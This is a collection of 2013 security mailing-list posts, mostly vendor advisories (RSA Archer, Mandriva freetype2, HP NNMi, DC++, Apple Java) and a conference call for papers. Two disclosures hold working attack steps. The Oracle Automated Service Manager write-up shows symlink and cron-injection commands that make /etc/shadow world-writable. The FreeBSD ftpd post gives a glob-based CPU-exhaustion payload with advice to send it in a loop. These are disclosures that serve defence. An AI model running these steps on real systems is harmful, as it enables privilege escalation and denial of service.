ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities EMC Identifier: ESA-2013-002 CVE Identifier: CVE-2012-2293, CVE-2012-2292, CVE-2012-1064, CVE-2012-2294 Severity Rating: See below for scores for individual issues Affected Products: RSA Archer SmartSuite Framework version 4.x RSA Archer GRC version 5.x Summary: RSA Archer GRC 5.3 and 5.2SP1 platform contains fixes for multiple security vulnerabilities that could potentially be exploited by malicious users to compromise the affected system. Details: The vulnerabilities addressed in RSA Archer GRC 5.3 and RSA Archer GRC 5.2SP1 are: 1. Path traversal vulnerability (CVE-2012-2293) This vulnerability may allow malicious users to upload arbitrary files to a vulnerable RSA Archer system using the relative paths. CVSSv2 Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C) 2. Improper permissions in Silverlight cross-domain policy (CVE-2012-2292) This vulnerability allows access to the RSA Archer application from any domain. This insecure permission may lead to cross-domain attacks. CVSSv2 Base Score: 8.3 (AV:N/AC:M/Au:N/C:C/I:P/A:P) 3. Multiple cross-site scripting vulnerabilities (CVE-2012-1064) These vulnerabilities can be exploited to execute arbitrary HTML and script code in an RSA Archer users browser session in context of an affected RSA Archer application. CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 4.Clickjacking vulnerability (CVE-2012-2294) A malicious user may exploit this vulnerability by constructing a specially crafted Web page disguised as legitimate content to conduct clickjacking attacks. The users clicks in the malicious page may perform unwanted actions. CVSSv2 Base Score:6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Resolution: RSA strongly recommends all customers upgrade to RSA Archer GRC v5.3 or install 5.2SP1 at their earliest opportunity. 5.3 installers are available through RSA SecureCare Online (SCOL) https://knowledge.rsasecurity.com 5.2SP1 installers are available from RSA Archer Customer Support. For additional information on fixes and steps to reduce risks, log on to https://knowledge.rsasecurity.com and select: Home » Products » RSA Archer eGRC Solutions » RSA Archer 5.3 ESA FAQ. Credits: RSA would like to thank Nello Coppeto at eMaze Network SpA (http://blog.emaze.net) for reporting issues under CVE-2012-1064. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Obtaining More Information: For more information about RSA SecurID, visit the RSA web site at http://www.rsa.com/node.aspx?id=1156. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of
[HITB-Announce] #HITB2013AMS FINAL CALL for Paper Submissions
Hi everyone - This is the FINAL CALL for paper submissions for the 4th annual HITB Security Conference in Amsterdam, #HITB2013AMS. We're looking for talks that are highly technical, but most importantly, material which is new and cutting edge. Submissions are due BEFORE 8th Feb 23:59 CET HITB CFP: http://cfp.hackinthebox.org/ --- #HITB2013AMS takes place at the Okura Hotel in Amsterdam from the 8th till the 11th of April. We kick off as always with two-days of hands on technical trainings (8th and 9th). We then continue with a triple track conference with keynotes by Eddie Schwartz, Chief Information Security Officer at RSA and Bob Lord, Chief Security Officer at Twitter. The closing keynote will be presented by Winn Schwartau. Event Website: http://conference.hitb.org/ === Each accepted submission will entitle the speaker(s) to accommodation for 3 nights / 4 days and travel expense reimbursement up to EUR1200.00 per speaking slot. Topics of interest include, but are not limited to the following: Cloud Security File System Security 3G/4G/WIMAX Security SS7/GSM/VoIP Security Security of Medical Devices Critical Infrastructure Security Smartphone / MobileSecurity Smart Card and Physical Security Network Protocols, Analysis and Attacks Applications of Cryptographic Techniques Side Channel Analysis of Hardware Devices Analysis of Malicious Code / Viruses / Malware Data Recovery, Forensics and Incident Response Hardware based attacks and reverse engineering Windows / Linux / OS X / *NIX Security Vulnerabilities Next Generation Exploit and Exploit Mitigation Techniques NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security Your submission will be reviewed by The HITB CFP Review Committee: Charlie Miller (formerly Principal Research Consultant, Accuvant Labs) Katie Moussouris, Senior Security Strategist, Microsoft Itzik Kotler, Chief Technology Officer, Security Art Cesar Cerrudo, Chief Technology Officer, IOActive Jeremiah Grossman, Founder, Whitehat Security Andrew Cushman, Senior Director, Microsoft Saumil Shah, Founder CEO Net-Square Thanh 'RD' Nguyen, THC, VNSECURITY Alexander Kornburst, Red Database Fredric Raynal, QuarksLab Shreeraj Shah, Founder, BlueInfy Emmanuel Gadaix, Founder, TSTF Andrea Barisani, Inverse Path Philippe Langlois, TSTF Ed Skoudis, InGuardians Haroon Meer, Thinkst Chris Evans, Google Raoul Chiesa, TSTF/ISECOM rsnake, SecTheory Gal Diskin, Intel Skyper, THC Note: We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferencei...@hackinthebox.org See you in Amsterdam! --- Hafez Kamal, HITB Conference Core Crew (.MY), Hack in The Box (M) Sdn. Bhd. 36th Floor, Menara Maxis, Kuala Lumpur City Centre, 50088 Kuala Lumpur, Malaysia Tel: +603-26157299 Fax: +603-26150088 PGP Key ID: 0xC0DC7DF8
Oracle Automated Service Manager 1.3 Auto Service Request 4.3 local root during install
Oracle Automated Service Manager 1.3 local root during install Larry W. Cashdollar 1/29/2013 @_larry0 SUNWsasm-1.3.1-20110815093723 https://updates.oracle.com/Orion/Services/download?type=readmearu=15864534 From the README: Oracle Automated Service Manager 1.3.1 Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport. It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it. Possible issues with files in /tmp. root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp ##Read the contents of crontab into a tmp file /usr/bin/crontab -l /tmp/crontab_edit echo 0 /tmp/tmpVariable grep /opt/SUNWswasr/bin/update_rules.sh /tmp/crontab_edit | echo 1 /tmp/tmpVariable grep 0 /tmp/tmpVariable /dev/null echo /tmp/crontab_edit echo ##Cronjob entry for ASR Auto Rules Update /tmp/crontab_edit echo $min $hour * * * /opt/SUNWswasr/bin/update_rules.sh /tmp/crontab_edit ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit` sed /asr report/d /tmp/crontab_edit /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed /ASR Status Report/d /tmp/crontab_edit /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit` sed /asr heartbeat/d /tmp/crontab_edit /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed /ASR Heartbeat/d /tmp/crontab_edit /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit /usr/bin/crontab /tmp/crontab_edit ## Finally remove the tmp file rm -f /tmp/tmpVariable rm -f /tmp/crontab_edit tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'` /usr/bin/crontab -l /tmp/asrtab.?? UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??` sed /update_rules.sh/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed /ASR Auto Rules/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??` sed /asr report/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed /ASR Status Report/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed /asr heartbeat/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? sed /ASR Heartbeat/d /tmp/asrtab.?? /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.?? /usr/bin/crontab /tmp/asrtab.?? rm /tmp/asrtab.?? ]!tmpD root@dev-unix-sec01:~/test# First try, File overwriting vulnerability $ ln -s /etc/shadow /tmp/mytab-tmp.?? $ ln -s /etc/shadow /tmp/mytab.?? [root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm Preparing... ### [100%] Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved. License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use) 1:SUNWsasm ### [100%] Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration. Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration. [root@oracle-lnx-lab02 ~]# cat /etc/shadow 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance /dev/null 21 Ok, lets try to inject a cronjob and get root: Malicious user does: [meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo * * * * * /tmp/rootme /tmp/mytab.??; done [root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm Preparing... ### [100%] Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved. License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use) 1:SUNWsasm ## [100%] [root@oracle-lnx-lab02 ~] crontab -l * * * * * /tmp/rootme 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance /dev/null 21 /tmp/rootme is: #!/bin/sh chmod 666 /etc/shadow after a minute: [root@oracle-lnx-lab02 ~] ls -l /etc/shadow -rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow [root@oracle-lnx-lab02 ~] Faulty Code: 319 /usr/bin/crontab -l /tmp/mytab.?? 320 if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then 321 echo 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance /dev/null 21 /tmp/mytab.?? 322 /usr/bin/crontab /tmp/mytab.?? 323 fi 324 325 rm /tmp/mytab.?? SUNWswasr RPM post install /tmp race condition From the documentation: Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to
FreeBSD 9.1 ftpd Remote Denial of Service
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...
--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old bug in libc
(CVE-2011-0418) allow to Denial of Service ftpd in last FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU resource
exhaustion. Login as a 'USER anonymous' 'PASS anonymous', sending 'STAT'
command with special wildchar, enought to create ftpd process with 100% CPU
usage.
Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include stdio.h
#include glob.h
int main(){
glob_t globbuf;
char
stringa[]={a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b};
glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT,
NULL, globbuf);
}
--- PoC ---
--- Exploit ---
user anonymous
pass anonymous
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
Result of attack:
ftp 13034 0.0 0.4 10416 1944 ?? R10:48PM0:00.96 ftpd:
cxsec.org anonymous/anonymous (ftpd)
ftp 13035 0.0 0.4 10416 1944 ?? R10:48PM0:00.89 ftpd:
cxsec.org anonymous/anonymous (ftpd)
ftp 13036 0.0 0.4 10416 1944 ?? R10:48PM0:00.73 ftpd:
cxsec.org anonymous/anonymous (ftpd)
ftp 13046 0.0 0.4 10416 1952 ?? R10:48PM0:00.41 ftpd:
cxsec.org anonymous/anonymous (ftpd)
ftp 13047 0.0 0.4 10416 1960 ?? R10:48PM0:00.42 ftpd:
cxsec.org anonymous/anonymous (ftpd)
..
root13219 0.0 0.3 10032 1424 ?? R10:52PM0:00.00
/usr/libexec/ftpd -dDA
root13225 0.0 0.3 10032 1428 ?? R10:52PM0:00.00
/usr/libexec/ftpd -dDA
root13409 0.0 0.3 10032 1404 ?? R10:53PM0:00.00
/usr/libexec/ftpd -dDA
root13410 0.0 0.3 10032 1404 ?? R10:53PM0:00.00
/usr/libexec/ftpd -dDA
..
=Sending:
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
=Result:
@ps:
ftp 1336 100.0 0.5 10416 2360 ?? R11:15PM 600:39.95 ftpd:
127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root1 1030 10416K 2360K RUN600:53 100.00% ftpd
one request over 600m (~10h) execution time and 100% CPU usage. This issue
allow to create N ftpd processes with 100% CPU usage.
Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24r2=1.23.10.2
The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, ~{[*?) != NULL) {
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
freeglob = 1;
if (glob(whichf, flags, 0, gl)) {
---
but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU resource
exhaustion. ;]
Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723
only FreeBSD and GNU glibc are affected
--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233
--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve problem
with security ;)
--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632
Multiple FTPD Server
[ MDVSA-2013:006 ] freetype2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:006 http://www.mandriva.com/security/ ___ Package : freetype2 Date: February 1, 2013 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in freetype2: A Null pointer de-reference flaw was found in the way Freetype font rendering engine handled Glyph bitmap distribution format (BDF) fonts. A remote attacker could provide a specially-crafted BDF font file, which once processed in an application linked against FreeType would lead to that application crash (CVE-2012-5668). An out-of heap-based buffer read flaw was found in the way FreeType font rendering engine performed parsing of glyph information and relevant bitmaps for glyph bitmap distribution format (BDF). A remote attacker could provide a specially-crafted BDF font file, which once opened in an application linked against FreeType would lead to that application crash (CVE-2012-5669). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5668 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5669 ___ Updated Packages: Mandriva Linux 2011: 2f3fec203494eb640bb48614b8cdbb27 2011/i586/freetype2-demos-2.4.5-2.4-mdv2011.0.i586.rpm 89091b1ba606e039e60303d358947fdc 2011/i586/libfreetype6-2.4.5-2.4-mdv2011.0.i586.rpm 6c2eae3f6588bc307b4ebb646c1a4c25 2011/i586/libfreetype6-devel-2.4.5-2.4-mdv2011.0.i586.rpm bcbd756fd42addea3fd2a38a11567f7a 2011/i586/libfreetype6-static-devel-2.4.5-2.4-mdv2011.0.i586.rpm 6c70cd4370fa8ed01c0285c46bba3597 2011/SRPMS/freetype2-2.4.5-2.4.src.rpm Mandriva Linux 2011/X86_64: abe907ac020e7a6a84d1e0eb86858aa1 2011/x86_64/freetype2-demos-2.4.5-2.4-mdv2011.0.x86_64.rpm 07c54a3f0face61f8cbb5983759ca9cb 2011/x86_64/lib64freetype6-2.4.5-2.4-mdv2011.0.x86_64.rpm 73ab4f6bf793c93a387eb7434c834900 2011/x86_64/lib64freetype6-devel-2.4.5-2.4-mdv2011.0.x86_64.rpm 41c33cc62c33163285ea2c0b1ce44532 2011/x86_64/lib64freetype6-static-devel-2.4.5-2.4-mdv2011.0.x86_64.rpm 6c70cd4370fa8ed01c0285c46bba3597 2011/SRPMS/freetype2-2.4.5-2.4.src.rpm Mandriva Enterprise Server 5: 505e61f7fc629cc51bce2777983da6ef mes5/i586/freetype2-demos-2.3.7-1.11mdvmes5.2.i586.rpm d6472b584d439b2149fa136995e0bd3e mes5/i586/libfreetype6-2.3.7-1.11mdvmes5.2.i586.rpm 2cbc0e8ba2697ad6534c8a97b6776448 mes5/i586/libfreetype6-devel-2.3.7-1.11mdvmes5.2.i586.rpm a678543b7e22d42a8c5f753c59e30087 mes5/i586/libfreetype6-static-devel-2.3.7-1.11mdvmes5.2.i586.rpm 9af34144efab6305f17b8a2e296d91ce mes5/SRPMS/freetype2-2.3.7-1.11mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 34ff382889cc95c97f1c68e6c234fd4c mes5/x86_64/freetype2-demos-2.3.7-1.11mdvmes5.2.x86_64.rpm 8d736d3cde5ca7348f6a4fff11016eda mes5/x86_64/lib64freetype6-2.3.7-1.11mdvmes5.2.x86_64.rpm abeb5fc6c8a8a36c50147500c412a6fd mes5/x86_64/lib64freetype6-devel-2.3.7-1.11mdvmes5.2.x86_64.rpm 4da0078d481d44a06445586dcc9e0e90 mes5/x86_64/lib64freetype6-static-devel-2.3.7-1.11mdvmes5.2.x86_64.rpm 9af34144efab6305f17b8a2e296d91ce mes5/SRPMS/freetype2-2.3.7-1.11mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFRC36EmqjQ0CJFipgRAubHAJ0delnQDUuB8LwdvUe6w2EVZCNUWACeLSV6 wQo28kQIhW9Iw2sw2XTidvc= =io0/ -END PGP SIGNATURE-
[security bulletin] HPSBMU02842 SSRT100909 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 UPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03652323 Version: 1 HPSBMU02842 SSRT100909 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-01-31 Last Updated: 2013-01-31 Potential Security Impact: Remote cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be remotely exploited resulting in cross site scripting (XSS). References: CVE-2012-3279 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Node Manager I (NNMi) v8.x, v9.0x, v9.1x, v9.20 for HP-UX, Linux, Solaris, and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3279(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made hotfixes available to resolve these vulnerabilities for NNMi v9.0x, v9.1x, and v9.20. The hotfixes can be obtained by contacting the normal HP Services support channel. Customers should open a support case to request the following hotfixes. Customers using NNMi v8.x should upgrade to v9.0x, v9.1x, or 9.20 and apply the required patch and the hotfix. For NNMi v9.0x and v9.1x NNMi Version / Required Patch / Hotfix 9.0x / Patch 5 / Hotfix-NNMi-9.0xP5-UI-Security-20130125 9.1x / Patch 3 or 4 / Patches: HP-UX. PHSS_43078, Linux. NNM910L_5, Solaris . NNM910S_5, Windows NNM910W_5 9.20 / no patch required / Hotfix-NNMi-9.20-NmsAsShared-20130125 Note: The hotfix must be installed after the required patch. The hotfix must be reinstalled if the required patch is reinstalled. For NNMi v8.x Upgrade to v9.0x, v9.1x, or v9.20 and apply the required patch and the hotfix listed in the table above. MANUAL ACTIONS: Yes - Update Install the applicable patch and hotfix. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS For HP-UX NNMi v9.1x HP-UX B.11.31 = HPOvNNM.HPOVNMSCAUSESV HPOvNNM.HPOVNMSDISCOSV HPOvNNM.HPOVICMP HPOvNNM.HPOVNMSCONFIG HPOvNNM.HPOVNNMCISCO HPOvNNM.HPOVNNMOM HPOvNNM.HPNMSCLUSTER HPOvNNM.HPOVNMSEMBDDB HPOvNNM.HPNMSDEVEXTN HPOvNNM.HPOVNNMBSM HPOvNNM.HPNNMTRAPSV HPOvNNM.HPOVNMSHA HPOvNnmSiteScope.HPOVNNMSITESCOPE HPOvNNM.HPOVNMSEVTPSV HPOvNNM.HPOVSTPLR HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.HPOVNMSISPINET HPOvNNM.HPNMSCOMPS HPOvNNM.HPOVNNMINSTALL HPOvNNM.HPOVNMSSNMPCO HPOvNNM.HPNMSJBOSS HPOvNNM.HPOVNMSSPMD HPOvNNM.HPOVNNMNC HPOvNNM.HPOVNNMNA HPOvNNM.HPOVNMSLIC HPOvNNM.HPOVNNMSIM HPOvNNM.HPOVNNMNB HPOvNNM.HPOVNNMUCMDB HPOvNNM.HPOVNMSSPICOM HPOvNNM.HPOVSNMP HPOvNNM.HPOVNNMBAC HPOvNnmRams.HPOVNNMRAMS HPOvNNM.HPOVNMSCOMMON HPOvNNM.HPOVNNMGEN HPOvNNM.HPOVNNMUI HPOvNNM.HPOVNMSRBA HPOvNNM.HPOVPERFSPIADA HPOvNNM.HPNMSCUSTPOLL action: install PHSS_43078 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 31 January 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters
DC++ 0.802 and below incorrectly registers URI schemes in Windows
DC++ 0.802 and below incorrectly registers URI schemes in Windows Background DC++ [1] is a chat and file sharing application for the Direct Connect [2] network. DC++ registers three URI schemes in Microsoft Windows; dchub, adc and magnet. Microsoft outlines the approach in 'Registering an Application to a URI scheme' [3]. Security issue description DC++ 0.802 and below registers the application in the registry key HKEY_CURRENT_USER/Software/Classes/adc/Shell/Open/Command (for adc, likewise for dchub and magnet). DC++ registers the application with the following command; C:\Program Files (x86)\DC++\DCPlusPlus.exe %1 (where the path mentioned is where DC++ is installed) Microsoft notes in the 'launching the handler' section that an application should register itself with quotation marks around the parameter that is passed to the application. DC++ 0.802 and below do not do this, as shown above. Microsoft specifies that the proper registration should look like; C:\Program Files (x86)\DC++\DCPlusPlus.exe %1 Microsoft notes in the same article potential attack vectors and potential formatting problems. Fix description A fix was deployed to the DC++ source control on 4th of January, 2013 [4], with the suggested changes from Microsoft. This fix is in DC++ 0.810. Exploits No known attacks or exploits are reported at this time. Affected versions: 0.802 and below. Additionally, any modification of the application may be affected. Found and fixed by: Fredrik Ullner ullner at gmail.com References [1] http://dcplusplus.sourceforge.net/ [2] http://en.wikipedia.org/wiki/Direct_Connect_(file_sharing) [3] http://msdn.microsoft.com/en-us/library/aa767914.aspx [4] http://bazaar.launchpad.net/~dcplusplus-team/dcplusplus/trunk/revision/3166 [5] http://sourceforge.net/projects/dcplusplus/files/DC%2B%2B%200.810/DCPlusPlus-0.810.exe/download?utm_expid=65835818-0utm_referrer=http%3A%2F%2Fdcplusplus.sourceforge.net%2Fdownload.html
APPLE-SA-2013-02-01-1 Java for Mac OS X v10.6 Update 12
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2013-02-01-1 Java for Mac OS X v10.6 Update 12 Java for Mac OS X v10.6 Update 12 is now available and addresses the following: Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Multiple vulnerabilities in Java 1.6.0_37 Description: Multiple vulnerabilities exist in Java 1.6.0_37, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Visiting a web page containing a maliciously crafted untrusted Java applet may lead to arbitrary code execution with the privileges of the current user. These issues are addressed by updating to Java version 1.6.0_39. Further information is available via the Java website at http://www.o racle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2012-3213 CVE-2012-3342 CVE-2013-0351 CVE-2013-0409 CVE-2013-0419 CVE-2013-0423 CVE-2013-0424 CVE-2013-0425 CVE-2013-0426 CVE-2013-0427 CVE-2013-0428 CVE-2013-0429 CVE-2013-0432 CVE-2013-0433 CVE-2013-0434 CVE-2013-0435 CVE-2013-0438 CVE-2013-0440 CVE-2013-0441 CVE-2013-0442 CVE-2013-0443 CVE-2013-0445 CVE-2013-0446 CVE-2013-0450 